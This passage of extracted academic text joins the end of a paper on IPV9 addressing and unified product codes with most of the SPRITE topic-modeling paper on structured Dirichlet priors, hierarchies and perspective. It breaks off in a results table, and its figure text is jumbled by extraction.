can choose valuable information download, methods to avoid intrusion of bad information and unexpected attacks. 4) Unified coding The domain name and the IP address synthesize, may cause the telephone, the handset, the domain name and the IP address, IPTV, the IP telephone and so on to combine into one number. This method saves the translation time between the domain name and the IP address, makes the network communication fast and convenient, and improves the communication capability of the existing network switching equipment. At present, electronic labels and bar codes are used and managed separately. IPV9 has developed more superior and more viable RFID electronic tags, barcode unified data format and application standard g g International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 13 system. It can make the electronic label and barcode unified into a code, so that a commodity code has three ways of identification: one-dimensional barcode, two-dimensional code and electronic label, the three represents are global unique code, and also are the IP address of the IPV9 domain name. This feature enables barcodes and electronic tags have the same Internet access capabilities, which will greatly reduce the management costs of the global manufacturing and logistics industries. ACKNOWLEDGMENT This paper is sponsored by the Xi'an Decimal Network Technology Co., Ltd.. REFERENCE [1] Xie Jianping etc. Method of using whole digital code to assign address for computer [P].US: 8082365, 2011.12. [2] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [3] S. Deering, R. Hinden, Network Working Group. Internet Protocol Version 6 (IPv6) Specification, RFC-1883, 1995.12. [4] M. Crawford. Network Working Group. Transmission of IPv6 Packets over Ethernet Networks. RFC-2464, 1998.12. [5] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [6] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. [7] Xie Jianping, Xu Dongmei, etc.Digital domain name specification. SJ/T11271-2002, 2002.07. [8] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. [9] Wenfeng, Xie Jianping, etc. Product and service digital identification format for information procession. SJ/T11603-2016, 2016. 06. [10] Radio frequency identification tag information query service network architecture technical specification. SJ/T11606-2016, 2016. 06. work_hhljuimcpfdjrp7qy2oosk7bry ---- SPRITE: Generalizing Topic Models with Structured Priors Michael J. Paul and Mark Dredze Department of Computer Science Human Language Technology Center of Excellence Johns Hopkins University, Baltimore, MD 21218 mpaul@cs.jhu.edu, mdredze@cs.jhu.edu Abstract We introduce SPRITE, a family of topic models that incorporates structure into model priors as a function of underlying components. The structured priors can be constrained to model topic hierarchies, factorizations, correlations, and supervi- sion, allowing SPRITE to be tailored to particular settings. We demonstrate this flexibility by constructing a SPRITE-based model to jointly infer topic hierarchies and author perspective, which we apply to cor- pora of political debates and online re- views. We show that the model learns in- tuitive topics, outperforming several other topic models at predictive tasks. 1 Introduction Topic models can be a powerful aid for analyzing large collections of text by uncovering latent in- terpretable structures without manual supervision. Yet people often have expectations about topics in a given corpus and how they should be structured for a particular task. It is crucial for the user expe- rience that topics meet these expectations (Mimno et al., 2011; Talley et al., 2011) yet black box topic models provide no control over the desired output. This paper presents SPRITE, a family of topic models that provide a flexible framework for en- coding preferences as priors for how topics should be structured. SPRITE can incorporate many types of structure that have been considered in prior work, including hierarchies (Blei et al., 2003a; Mimno et al., 2007), factorizations (Paul and Dredze, 2012; Eisenstein et al., 2011), sparsity (Wang and Blei, 2009; Balasubramanyan and Co- hen, 2013), correlations between topics (Blei and Lafferty, 2007; Li and McCallum, 2006), pref- erences over word choices (Andrzejewski et al., 2009; Paul and Dredze, 2013), and associations between topics and document attributes (Ramage et al., 2009; Mimno and McCallum, 2008). SPRITE builds on a standard topic model, adding structure to the priors over the model pa- rameters. The priors are given by log-linear func- tions of underlying components (§2), which pro- vide additional latent structure that we will show can enrich the model in many ways. By apply- ing particular constraints and priors to the compo- nent hyperparameters, a variety of structures can be induced such as hierarchies and factorizations (§3), and we will show that this framework cap- tures many existing topic models (§4). After describing the general form of the model, we show how SPRITE can be tailored to partic- ular settings by describing a specific model for the applied task of jointly inferring topic hierar- chies and perspective (§6). We experiment with this topic+perspective model on sets of political debates and online reviews (§7), and demonstrate that SPRITE learns desired structures while outper- forming many baselines at predictive tasks. 2 Topic Modeling with Structured Priors Our model family generalizes latent Dirichlet al- location (LDA) (Blei et al., 2003b). Under LDA, there are K topics, where a topic is a categor- ical distribution over V words parameterized by φk. Each document has a categorical distribution over topics, parameterized by θm for the mth doc- ument. Each observed word in a document is gen- erated by drawing a topic z from θm, then drawing the word from φz. θ and φ have priors given by Dirichlet distributions. Our generalization adds structure to the gener- ation of the Dirichlet parameters. The priors for these parameters are modeled as log-linear com- binations of underlying components. Components are real-valued vectors of length equal to the vo- cabulary size V (for priors over word distribu- tions) or length equal to the number of topics K (for priors over topic distributions). For example, we might assume that topics about sports like baseball and football share a common prior – given by a component – with general words about sports. A fine-grained topic about steroid use in sports might be created by combining com- ponents about broader topics like sports, medicine, and crime. By modeling the priors as combina- tions of components that are shared across all top- ics, we can learn interesting connections between topics, where components provide an additional latent layer for corpus understanding. As we’ll show in the next section, by imposing certain requirements on which components feed into which topics (or documents), we can induce a variety of model structures. For example, if we want to model a topic hierarchy, we require that each topic depend on exactly one parent compo- nent. If we want to jointly model topic and ide- ology in a corpus of political documents (§6), we make topic priors a combination of one component from each of two groups: a topical component and an ideological component, resulting in ideology- specific topics like “conservative economics”. Components construct priors as follows. For the topic-specific word distributions φ, there are C(φ) topic components. The kth topic’s prior over φk is a weighted combination (with coefficient vector βk) of the C(φ) components (where component c is denoted ωc). For the document-specific topic dis- tributions θ, there are C(θ) document components. The mth document’s prior over θm is a weighted combination (coefficients αm) of the C(θ) compo- nents (where component c is denoted δc). Once conditioned on these priors, the model is identical to LDA. The generative story is de- scribed in Figure 1. We call this family of models SPRITE: Structured PRIor Topic modEls. To illustrate the role that components can play, consider an example in which we are modeling re- search topics in a corpus of NLP abstracts (as we do in §7.3). Consider three speech-related topics: signal processing, automatic speech recognition, and dialog systems. Conceptualized as a hierar- chy, these topics might belong to a higher level category of spoken language processing. SPRITE allows the relationship between these three topics to be defined in two ways. One, we can model that these topics will all have words in common. This is handled by the topic components – these three topics could all draw from a common “spoken lan- • Generate hyperparameters: α, β, δ, ω (§3) • For each document m, generate parameters: 1. θ̃mk = exp( ∑C(θ) c=1 αmc δck), 1≤k≤K 2. θm ∼ Dirichlet(θ̃m) • For each topic k, generate parameters: 1. φ̃kv = exp( ∑C(φ) c=1 βkc ωcv), 1≤v≤V 2. φk ∼ Dirichlet(φ̃k) • For each token (m,n), generate data: 1. Topic (unobserved): zm,n ∼ θm 2. Word (observed): wm,n ∼ φzm,n Figure 1: The generative story of SPRITE. The difference from latent Dirichlet allocation (Blei et al., 2003b) is the gen- eration of the Dirichlet parameters. guage” topic component, with high-weight words such as speech and spoken, which informs the prior of all three topics. Second, we can model that these topics are likely to occur together in docu- ments. For example, articles about dialog systems are likely to discuss automatic speech recognition as a subroutine. This is handled by the document components – there could be a “spoken language” document component that gives high weight to all three topics, so that if a document draw its prior from this component, then it is more likely to give probability to these topics together. The next section will describe how particular priors over the coefficients can induce various structures such as hierarchies and factorizations, and components and coefficients can also be pro- vided as input to incorporate supervision and prior knowledge. The general prior structure used in SPRITE can be used to represent a wide array of existing topic models, outlined in Section 4. 3 Topic Structures By changing the particular configuration of the hy- perparameters – the component coefficients (α and β) and the component weights (δ and ω) – we ob- tain a diverse range of model structures and behav- iors. We now describe possible structures and the corresponding priors. 3.1 Component Structures This subsection discusses various graph structures that can describe the relation between topic com- ponents and topics, and between document com- ponents and documents, illustrated in Figure 2. (a) Dense DAG (b) Sparse DAG (c) Tree (d) Factored Forest Figure 2: Example graph structures describing possible relations between components (middle row) and topics or documents (bottom row). Edges correspond to non-zero values for α or β (the component coefficients defining priors over the document and topic distributions). The root node is a shared prior over the component weights (with other possibilities discussed in §3.3). 3.1.1 Directed Acyclic Graph The general SPRITE model can be thought of as a dense directed acyclic graph (DAG), where every document or topic is connected to every compo- nent with some weight α or β. When many of the α or β coefficients are zero, the DAG becomes sparse. A sparse DAG has an intuitive interpre- tation: each document or topic depends on some subset of components. The default prior over coefficients that we use in this study is a 0-mean Gaussian distribution, which encourages the weights to be small. We note that to induce a sparse graph, one could use a 0-mean Laplace distribution as the prior over α and β, which prefers parameters such that some components are zero. 3.1.2 Tree When each document or topic has exactly one par- ent (one nonzero coefficient) we obtain a two-level tree structure. This structure naturally arises in topic hierarchies, for example, where fine-grained topics are children of coarse-grained topics. To create an (unweighted) tree, we require αmc ∈ {0, 1} and ∑ c αmc = 1 for each docu- ment m. Similarly, βkc ∈ {0, 1} and ∑ c βkc = 1 for each topic k. In this setting, αm and βk are indicator vectors which select a single component. In this study, rather than strictly requiring αm and βk to be binary-valued indicator vectors, we create a relaxation that allows for easier parameter estimation. We let αm and βk to real-valued vari- ables in a simplex, but place a prior over their val- ues to encourage sparse values, favoring vectors with a single component near 1 and others near 0. This is achieved using a Dirichlet(ρ < 1) distribu- tion as the prior over α and β, which has higher density near the boundaries of the simplex.1 1This generalizes the technique used in Paul and Dredze (2012), who approximated binary variables with real-valued variables in (0, 1), by using a “U-shaped” Beta(ρ < 1) distri- For a weighted tree, α and β could be a product of two variables: an “integer-like” indicator vec- tor with sparse Dirichlet prior as suggested above, combined with a real-valued weight (e.g., with a Gaussian prior). We take this approach in our model of topic and perspective (§6). 3.1.3 Factored Forest By using structured sparsity over the DAG, we can obtain a structure where components are grouped into G factors, and each document or topic has one parent from each group. Figure 2(d) illus- trates this: the left three components belong to one group, the right two belong to another, and each bottom node has exactly one parent from each. This is a DAG that we call a “factored forest” be- cause the subgraphs associated with each group in isolation are trees. This structure arises in “multi- dimensional” models like SAGE (Eisenstein et al., 2011) and Factorial LDA (Paul and Dredze, 2012), which allow tokens to be associated with multiple variables (e.g. a topic along with a variable denot- ing positive or negative sentiment). This allows word distributions to depend on both factors. The “exactly one parent” indicator constraint is the same as in the tree structure but enforces a tree only within each group. This can therefore be (softly) modeled using a sparse Dirichlet prior as described in the previous subsection. In this case, the subsets of components belonging to each fac- tor have separate sparse Dirichlet priors. Using the example from Figure 2(d), the first three com- ponent indicators would come from one Dirichlet, while the latter two component indicators would come from a second. 3.2 Tying Topic and Document Components A desirable property for many situations is for the topic and document components to correspond to bution as the prior to encourage sparsity. The Dirichlet distri- bution is the multivariate extension of the Beta distribution. each other. For example, if we think of the com- ponents as coarse-grained topics in a hierarchy, then the coefficients β enforce that topic word dis- tributions share a prior defined by their parent ω component, while the coefficients α represent a document’s proportions of coarse-grained topics, which effects the document’s prior over child top- ics (through the δ vectors). Consider the example with spoken language topics in §2: these three top- ics (signal processing, speech recognition, and di- alog systems) are a priori likely both to share the same words and to occur together in documents. By tying these together, we ensure that the pat- terns are consistent across the two types of com- ponents, and the patterns from both types can re- inforce each other during inference. In this case, the number of topic components is the same as the number of document compo- nents (C(φ) = C(θ)), and the coefficients (βcz) of the topic components should correlate with the weights of the document components (δzc). The approach we take (§6) is to define δ and β as a product of two variables (suggested in §3.1.2): a binary mask variable (with sparse Dirichlet prior), which we let be identical for both δ and β, and a real-valued positive weight. 3.3 Deep Components As for priors over the component weights δ and ω, we assume they are generated from a 0-mean Gaussian. While not experimented with in this study, it is also possible to allow the components themselves to have rich priors which are functions of higher level components. For example, rather than assuming a mean of zero, the mean could be a weighted combination of higher level weight vec- tors. This approach was used by Paul and Dredze (2013) in Factorial LDA, in which each ω compo- nent had its own Gaussian prior provided as input to guide the parameters. 4 Special Cases and Extensions We now describe several existing Dirichlet prior topic models and show how they are special cases of SPRITE. Table 1 summarizes these models and their relation to SPRITE. In almost every case, we also describe how the SPRITE representation of the model offers improvements over the original model or can lead to novel extensions. Model Sec. Document priors Topic priors LDA 4.1 Single component Single component SCTM 4.2 Single component Sparse binary β SAGE 4.3 Single component Sparse ω FLDA 4.3 Binary δ is transpose of β Factored binary β PAM 4.4 α are supertopic weights Single component DMR 4.5 α are feature values Single component Table 1: Topic models with Dirichlet priors that are gen- eralized by SPRITE. The description of each model can be found in the noted section number. PAM is not equivalent, but captures very similar behavior. The described component formulations of SCTM and SAGE are equivalent, but these differ from SPRITE in that the components directly define the parameters, rather than priors over the parameters. 4.1 Latent Dirichlet Allocation In LDA (Blei et al., 2003b), all θ vectors are drawn from the same prior, as are all φ vectors. This is a basic instance of our model with only one component at the topic and document levels, C(θ) = C(φ) = 1, with coefficients α = β = 1. 4.2 Shared Components Topic Models Shared components topic models (SCTM) (Gorm- ley et al., 2010) define topics as products of “com- ponents”, where components are word distribu- tions. To use the notation of our paper, the kth topic’s word distribution in SCTM is parameter- ized by φkv ∝ ∏ c ω βkc cv , where the ω vectors are word distributions (rather than vectors in RV ), and the βkc ∈ {0, 1} variables are indicators denoting whether component c is in topic k. This is closely related to SPRITE, where top- ics also depend on products of underlying com- ponents. A major difference is that in SCTM, the topic-specific word distributions are exactly defined as a product of components, whereas in SPRITE, it is only the prior that is a product of components.2 Another difference is that SCTM has an unweighted product of components (β is bi- nary), whereas SPRITE allows for weighted prod- ucts. The log-linear parameterization leads to sim- pler optimization procedures than the product pa- rameterization. Finally, the components in SCTM only apply to the word distributions, and not the topic distributions in documents. 4.3 Factored Topic Models Factored topic models combine multiple aspects of the text to generate the document (instead of just topics). One such topic model is Factorial LDA (FLDA) (Paul and Dredze, 2012). In FLDA, 2The posterior becomes concentrated around the prior when the Dirichlet variance is low, in which case SPRITE be- haves like SCTM. SPRITE is therefore more general. “topics” are actually tuples of potentially multiple variables, such as aspect and sentiment in online reviews (Paul et al., 2013). Each document distri- bution θm is a distribution over pairs (or higher- dimensional tuples if there are more than two fac- tors), and each pair (j,k) has a word distribu- tion φ(j,k). FLDA uses a similar log-linear pa- rameterization of the Dirichlet priors as SPRITE. Using our notation, the Dirichlet(φ̃(j,k)) prior for φ(j,k) is defined as φ̃(j,k),v=exp(ωjv+ωkv), where ωj is a weight vector over the vocabulary for the jth component of the first factor, and ωk encodes the weights for the kth component of the second factor. (Some bias terms are omitted for sim- plicity.) The prior over θm has a similar form: θ̃m,(j,k)=exp(αmj + αmk), where αmj is docu- ment m’s preference for component j of the first factor (and likewise for k of the second). This corresponds to an instantiation of SPRITE using an unweighted factored forest (§3.1.3), where βzc = δcz (§3.2, recall that δ are document components while β are the topic coefficients). Each subtopic z (which is a pair of variables in the two-factor model) has one parent component from each factor, indicated by βz which is binary- valued. At the document level in the two-factor example, δj is an indicator vector with values of 1 for all pairs with j as the first component, and thus the coefficient αmj controls the prior for all such pairs of the form (j, ·), and likewise δk indicates pairs with k as the second component, controlling the prior over (·,k). The SPRITE representation offers a benefit over the original FLDA model. FLDA assumes that the entire Cartesian product of the different factors is represented in the model (e.g. φ parameters for ev- ery possible tuple), which leads to issues with effi- ciency and overparameterization with higher num- bers of factors. With SPRITE, we can simply fix the number of “topics” to a number smaller than the size of the Cartesian product, and the model will learn which subset of tuples are included, through the values of β and δ. Finally, another existing model family that al- lows for topic factorization is the sparse additive generative model (SAGE) (Eisenstein et al., 2011). SAGE uses a log-linear parameterization to define word distributions. SAGE is a general family of models that need not be factored, but is presented as an efficient solution for including multiple fac- tors, such as topic and geography or topic and au- thor ideology. Like SCTM, φ is exactly defined as a product of ω weights, rather than our approach of using the product to define a prior over φ. 4.4 Topic Hierarchies and Correlations While the two previous subsections primarily fo- cused on word distributions (with FLDA being an exception that focused on both), SPRITE’s priors over topic distributions also have useful charac- teristics. The component-specific δ vectors can be interpreted as common topic distribution pat- terns, where each component is likely to give high weight to groups of topics that tend to occur to- gether. Each document’s α weights encode which of the topic groups are present in that document. Similar properties are captured by the Pachinko allocation model (PAM) (Li and McCallum, 2006). Under PAM, each document has a distri- bution over supertopics. Each supertopic is as- sociated with a Dirichlet prior over subtopic dis- tributions, where subtopics are the low level top- ics that are associated with word parameters φ. Documents also have supertopic-specific distribu- tions over subtopics (drawn from each supertopic- specific Dirichlet prior). Each topic in a document is drawn by first drawing a supertopic from the document’s distribution, then drawing a subtopic from that supertopic’s document distribution. While not equivalent, this is quite similar to SPRITE where document components correspond to supertopics. Each document’s α weights can be interpreted to be similar to a distribution over supertopics, and each δ vector is that supertopic’s contribution to the prior over subtopics. The prior over the document’s topic distribution is thus af- fected by the document’s supertopic weights α. The SPRITE formulation naturally allows for powerful extensions to PAM. One possibility is to include topic components for the word distri- butions, in addition to document components, and to tie together δcz and βzc (§3.2). This models the intuitive characteristic that subtopics belonging to similar supertopics (encoded by δ) should come from similar priors over their word distributions (since they will have similar β values). That is, children of a supertopic are topically related – they are likely to share words. This is a richer alterna- tive to the hierarchical variant of PAM proposed by Mimno et al. (2007), which modeled separate word distributions for supertopics and subtopics, but the subtopics were not dependent on the super- topic word distributions. Another extension is to form a strict tree structure, making each subtopic belong to exactly one supertopic: a true hierarchy. 4.5 Conditioning on Document Attributes SPRITE also naturally provides the ability to con- dition document topic distributions on features of the document, such as a user rating in a review. To do this, let the number of document compo- nents be the number of features, and the value of αmc is the mth document’s value of the cth fea- ture. The δ vectors then influence the document’s topic prior based on the feature values. For exam- ple, increasing αmc will increase the prior for topic z if δcz is positive and decrease the prior if δcz is negative. This is similar to the structure used for PAM (§4.4), but here the α weights are fixed and provided as input, rather than learned and inter- preted as supertopic weights. This is identical to the Dirichlet-multinomial regression (DMR) topic model (Mimno and McCallum, 2008). The DMR topic model define’s each document’s Dirichlet prior over topics as a log-linear function of the document’s feature values and regression coeffi- cients for each topic. The cth feature’s regression coefficients correspond to the δc vector in SPRITE. 5 Inference and Parameter Estimation We now discuss how to infer the posterior of the latent variables z and parameters θ and φ, and find maximum a posteriori (MAP) estimates of the hy- perparameters α, β, δ, and ω, given their hyperpri- ors. We take a Monte Carlo EM approach, using a collapsed Gibbs sampler to sample from the pos- terior of the topic assignments z conditioned on the hyperparameters, then optimizing the hyperpa- rameters using gradient-based optimization condi- tioned on the samples. Given the hyperparameters, the sampling equa- tions are identical to the standard LDA sampler (Griffiths and Steyvers, 2004). The partial deriva- tive of the collapsed log likelihood L of the corpus with respect to each hyperparameter βkc is: ∂L ∂βkc = ∂P(β) ∂βkc + ∑ v ωcvφ̃kv × (1)( Ψ(n k v +φ̃kv) −Ψ(φ̃kv) +Ψ( ∑ k′φ̃k′v) −Ψ( ∑ k′n k′ v +φ̃k′v) ) where φ̃kv=exp( ∑ c′ βkc′ωc′v), n k v is the number of times word v is assigned to topic k (in the samples from the E-step), and Ψ is the digamma function, the derivative of the log of the gamma function. The digamma terms arise from the Dirichlet-multinomial distribution, when integrat- ing out the parameters φ. P(β) is the hyperprior. For a 0-mean Gaussian hyperprior with variance σ2, ∂P(β) ∂βkc = −βkc σ2 . Under a Dirchlet(ρ) hyper- prior, when we want β to represent an indicator vector (§3.1.2), ∂P(β) ∂βkc = ρ−1 βkc . The partial derivatives for the other hyperpa- rameters are similar. Rather than involving a sum over the vocabulary, ∂L ∂δck sums over documents, while ∂L ∂ωcv and ∂L ∂αmc sum over topics. Our inference algorithm alternates between one Gibbs iteration and one iteration of gradient as- cent, so that the parameters change gradually. For unconstrained parameters, we use the update rule: xt+1=xt + ηt∇L(xt), for some variable x and a step size ηt at iteration t. For parameters con- strained to the simplex (such as when β is a soft indicator vector), we use exponentiated gradient ascent (Kivinen and Warmuth, 1997) with the up- date rule: xt+1i ∝ x t i exp(ηt∇iL(x t)). 5.1 Tightening the Constraints For variables that we prefer to be binary but have softened to continuous variables using sparse Beta or Dirichlet priors, we can straightforwardly strengthen the preference to be binary by modify- ing the objective function to favor the prior more heavily. Specifically, under a Dirichlet(ρ<1) prior we will introduce a scaling parameter τt ≥ 1 to the prior log likelihood: τt log P(β) with par- tial derivative τt ρ−1 βkc , which adds extra weight to the sparse Dirichlet prior in the objective. The algorithm used in our experiments begins with τ1 = 1 and optionally increases τ over time. This is a deterministic annealing approach, where τ corresponds to an inverse temperature (Ueda and Nakano, 1998; Smith and Eisner, 2006). As τ approaches infinity, the prior-annealed MAP objective maxβ P(φ|β)P(β)τ approaches maxβ P(φ|β) maxβ P(β). Annealing only the prior P(β) results in maximization of this term only, while the outer max chooses a good β under P(φ|β) as a tie-breaker among all β values that maximize the inner max (binary-valued β).3 We show experimentally (§7.2.2) that annealing the prior yields values that satisfy the constraints. 3Other modifications could be made to the objective func- tion to induce sparsity, such as entropy regularization (Bala- subramanyan and Cohen, 2013). 6 A Factored Hierarchical Model of Topic and Perspective We will now describe a SPRITE model that en- compasses nearly all of the structures and exten- sions described in §3–4, followed by experimen- tal results using this model to jointly capture topic and “perspective” in a corpus of political debates (where perspective corresponds to ideology) and a corpus of online doctor reviews (where perspec- tive corresponds to the review sentiment). First, we will create a topic hierarchy (§4.4). The hierarchy will model both topics and docu- ments, where αm is document m’s supertopic pro- portions, δc is the cth supertopic’s subtopic prior, ωc is the cth supertopic’s word prior, and βk is the weight vector that selects the kth topic’s par- ent supertopic, which incorporates (soft) indicator vectors to encode a tree structure (§3.1.2). We want a weighted tree; while each βk has only one nonzero element, the nonzero element can be a value other than 1. We do this by replac- ing the single coefficient βkc with a product of two variables: bkcβ̂kc. Here, β̂k is a real-valued weight vector, while bkc is a binary indicator vector which zeroes out all but one element of βk. We do the same with the δ vectors, replacing δck with bkcδ̂ck. The b variables are shared across both topic and document components, which is how we tie these together (§3.2). We relax the binary requirement and instead allow a positive real-valued vector whose elements sum to 1, with a Dirichlet(ρ<1) prior to encourage sparsity (§3.1.2). To be properly interpreted as a hierarchy, we constrain the coefficients α and β (and by ex- tension, δ) to be positive. To optimize these pa- rameters in a mathematically convenient way, we write βkc as exp(log βkc), and instead optimize log βkc ∈ R rather than βkc ∈ R+. Second, we factorize (§4.3) our hierarchy such that each topic depends not only on its supertopic, but also on a value indicating perspective. For ex- ample, a conservative topic about energy will ap- pear differently from a liberal topic about energy. The prior for a topic will be a log-linear combina- tion of both a supertopic (e.g. energy) and a per- spective (e.g. liberal) weight vector. The variables associated with the perspective component are de- noted with superscript (P) rather than subscript c. To learn meaningful perspective parameters, we include supervision in the form of document at- tributes (§4.5). Each document includes a pos- • bk ∼ Dirichlet(ρ < 1) (soft indicator) • α(P) is given as input (perspective value) • δ(P)k = β (P) k • φ̃kv = exp(ω (B) v +β (P) k ω (P) v + ∑ c bkcβ̂kcωcv) • θ̃mk = exp(δ (B) k +α (P) m δ (P) k + ∑ c bkcαmcδ̂ck) Figure 3: Summary of the hyperparameters in our SPRITE- based topic and perspective model (§6). itive or negative score denoting the perspective, which is the variable α(P)m for document m. Since α(P) are the coefficients for δ(P), positive values of δ(P)k indicate that topic k is more likely if the au- thor is conservative (which has a positive α score in our data), and less likely if the author is liberal (which has a negative score). There is only a single perspective component, but it represents two ends of a spectrum with positive and negative weights; β(P) and δ(P) are not constrained to be positive, unlike the supertopics. We also set β(P)k = δ (P) k . This means that topics with positive δ(P)k will also have a positive β coefficient that is multiplied with the perspective word vector ω(P). Finally, we include “bias” component vectors denoted ω(B) and δ(B), which act as overall weights over the vocabulary and topics, so that the component-specific ω and δ weights can be inter- preted as deviations from the global bias weights. Figure 3 summarizes the model. This includes most of the features described above (trees, fac- tored structures, tying topic and document compo- nents, and document attributes), so we can ablate model features to measure their effect. 7 Experiments 7.1 Datasets and Experimental Setup We applied our models to two corpora: • Debates: A set of floor debates from the 109th– 112th U.S. Congress, collected by Nguyen et al. (2013), who also applied a hierarchical topic model to this data. Each document is a tran- script of one speaker’s turn in a debate, and each document includes the first dimension of the DW-NOMINATE score (Lewis and Poole, 2004), a real-valued score indicating how conservative (positive) or liberal (negative) the speaker is. This value is α(P). We took a sample of 5,000 documents from the House debates (850,374 to- kens; 7,426 types), balanced across party affilia- tion. We sampled from the most partisan speak- ers, removing scores below the median value. • Reviews: Doctor reviews from RateMDs.com, previously analyzed using FLDA (Paul et al., 2013; Wallace et al., 2014). The reviews con- tain ratings on a 1–5 scale for multiple aspects. We centered the ratings around the middle value 3, then took reviews that had the same sign for all aspects, and averaged the scores to produce a value for α(P). Our corpus contains 20,000 documents (476,991 tokens; 10,158 types), bal- anced across positive/negative scores. Unless otherwise specified, K=50 topics and C=10 components (excluding the perspective component) for Debates, and K=20 and C=5 for Reviews. These values were chosen as a qualita- tive preference, not optimized for predictive per- formance, but we experiment with different values in §7.2.2. We set the step size ηt according to Ada- Grad (Duchi et al., 2011), where the step size is the inverse of the sum of squared historical gradi- ents.4 We place a sparse Dirichlet(ρ=0.01) prior on the b variables, and apply weak regulariza- tion to all other hyperparameters via a N(0, 102) prior. These hyperparameters were chosen after only minimal tuning, and were selected because they showed stable and reasonable output qualita- tively during preliminary development. We ran our inference algorithm for 5000 itera- tions, estimating the parameters θ and φ by aver- aging the final 100 iterations. Our results are aver- aged across 10 randomly initialized samplers.5 7.2 Evaluating the Topic Perspective Model 7.2.1 Analysis of Output Figure 4 shows examples of topics learned from the Reviews corpus. The figure includes the high- est probability words in various topics as well as the highest weight words in the supertopic com- ponents and perspective component, which feed into the priors over the topic parameters. We see that one supertopic includes many words related to surgery, such as procedure and performed, and has multiple children, including a topic about dental work. Another supertopic includes words describ- ing family members such as kids and husband. 4AdaGrad decayed too quickly for the b variables. For these, we used a variant suggested by Zeiler (2012) which uses an average of historical gradients rather than a sum. 5Our code and the data will be available at: http://cs.jhu.edu/˜mpaul. One topic has both supertopics as parents, which appears to describe surgeries that saved a family member’s life, with top words including {saved, life, husband, cancer}. The figure also illustrates which topics are associated more with positive or negative reviews, as indicated by the value of δ(P). Interpretable parameters were also learned from the Debates corpus. Consider two topics about energy that have polar values of δ(P). The conservative-leaning topic is about oil and gas, with top words including {oil, gas, companies, prices, drilling}. The liberal-leaning topic is about renewable energy, with top words includ- ing {energy, new, technology, future, renewable}. Both of these topics share a common parent of an industry-related supertopic whose top words are {industry, companies, market, price}. A nonparti- san topic under this same supertopic has top words {credit, financial, loan, mortgage, loans}. 7.2.2 Quantitative Evaluation We evaluated the model on two predictive tasks as well as topic quality. The first metric is perplex- ity of held-out text. The held-out set is based on tokens rather than documents: we trained on even numbered tokens and tested on odd tokens. This is a type of “document completion” evaluation (Wal- lach et al., 2009b) which measures how well the model can predict held-out tokens of a document after observing only some. We also evaluated how well the model can pre- dict the attribute value (DW-NOMINATE score or user rating) of the document. We trained a linear regression model using the document topic distri- butions θ as features. We held out half of the docu- ments for testing and measured the mean absolute error. When estimating document-specific SPRITE parameters for held-out documents, we fix the fea- ture value α(P)m = 0 for that document. These predictive experiments do not directly measure performance at many of the particular tasks that topic models are well suited for, like data exploration, summarization, and visualiza- tion. We therefore also include a metric that more directly measures the quality and interpretability of topics. We use the topic coherence metric intro- duced by Mimno et al. (2011), which is based on co-occurrence statistics among each topic’s most probable words and has been shown to correlate with human judgments of topic quality. This met- ric measures the quality of each topic, and we best! love! years! caring! children! really! wonderful! hes! great! family! comfortable! listens! thank! amazing! …! …! went! pay! later! staff! asked! money! company! refused! pain! office! didn’t! said! told! doctor! surgery! pain! went! dr! surgeon! told! procedure! months! performed! removed! left! fix! said! later! years! dr! life! thank! saved! god! husband! heart! cancer! years! helped! doctors! hospital! father! man! able! told! hospital! dr! blood! went! later! days! mother! said! er! cancer! weight! home! father! months! dentist! teeth! dental! work! tooth! root! mouth! pain! dentists! went! filling! canal! dr! crown! cleaning! dr! best! children! years! kids! cares! hes! care! old! daughter! child! husband! family! pediatrician! trust! baby! son! pregnancy! dr! child! pregnant! ob! daughter! first! delivered! gyn! birth! delivery! section! hospital! dr! best! years! doctor! love! cares! ive! children! patients! hes! family! kids! seen! doctors! son! pain! surgery! dr! went! knee! foot! neck! mri! injury! shoulder! bone! months! told! surgeon! therapy! Perspective! “Surgery”! “Family”! Figure 4: Examples of topics (gray boxes) and components (colored boxes) learned on the Reviews corpus with 20 topics and 5 components. Words with the highest and lowest values of ω(P), the perspective component, are shown on the left, reflecting positive and negative sentiment words. The words with largest ω values in two supertopic components are also shown, with manually given labels. Arrows from components to topics indicate that the topic’s word distribution draws from that component in its prior (with non-zero β value). There are also implicit arrows from the perspective component to all topics (omitted for clarity). The vertical positions of topics reflect the topic’s perspective value δ(P). Topics centered above the middle line are more likely to occur in reviews with positive scores, while topics below the middle line are more likely in negative reviews. Note that this is a “soft” hierarchy because the tree structure is not strictly enforced, so some topics have multiple parent components. Table 3 shows how strict trees can be learned by tuning the annealing parameter. measure the average coherence across all topics: 1 K K∑ k=1 M∑ m=2 m−1∑ l=1 log DF(vkm,vkl) + 1 DF(vkl) (2) where DF(v,w) is the document frequency of words v and w (the number of documents in which they both occur), DF(v) is the document fre- quency of word v, and vki is the ith most probable word in topic k. We use the top M = 20 words. This metric is limited to measuring only the qual- ity of word clusters, ignoring the potentially im- proved interpretability of organizing the data into certain structures. However, it is still useful as an alternative measure of performance and utility, in- dependent of the models’ predictive abilities. Using these three metrics, we compared to sev- eral variants (denoted in bold) of the full model to understand how the different parts of the model affect performance: • Variants that contain the hierarchy components but not the perspective component (Hierarchy only), and vice versa (Perspective only). • The “hierarchy only” model using only docu- ment components δ and no topic components. This is a PAM-style model because it exhibits similar behavior to PAM (§4.4). We also com- pared to the original PAM model. • The “hierarchy only” model using only topic components ω and no document components. This is a SCTM-style model because it exhibits similar behavior to SCTM (§4.2). • The full model where α(P) is learned rather than given as input. This is a FLDA-style model that has similar behavior to FLDA (§4.3). We also compared to the original FLDA model. • The “perspective only” model but without the ω(P) topic component, so the attribute value af- fects only the topic distributions and not the word distributions. This is identical to the DMR model of Mimno and McCallum (2008) (§4.5). • A model with no components except for the bias vectors ω(B) and δ(B). This is equiva- lent to LDA with optimized hyperparameters (learned). We also experimented with using fixed symmetric hyperparameters, using val- ues suggested by Griffiths and Steyvers (2004): 50/K and 0.01 for topic and word distributions. To put the results in context, we also compare to two types of baselines: (1) “bag of words” base- lines, where we measure the perplexity of add-one smoothed unigram language models, we measure Debates Reviews Model Perplexity Prediction error Coherence Perplexity Prediction error Coherence Full model †1555.5 ± 2.3 †0.615 ± 0.001 -342.8 ± 0.9 †1421.3 ± 8.4 †0.787 ± 0.006 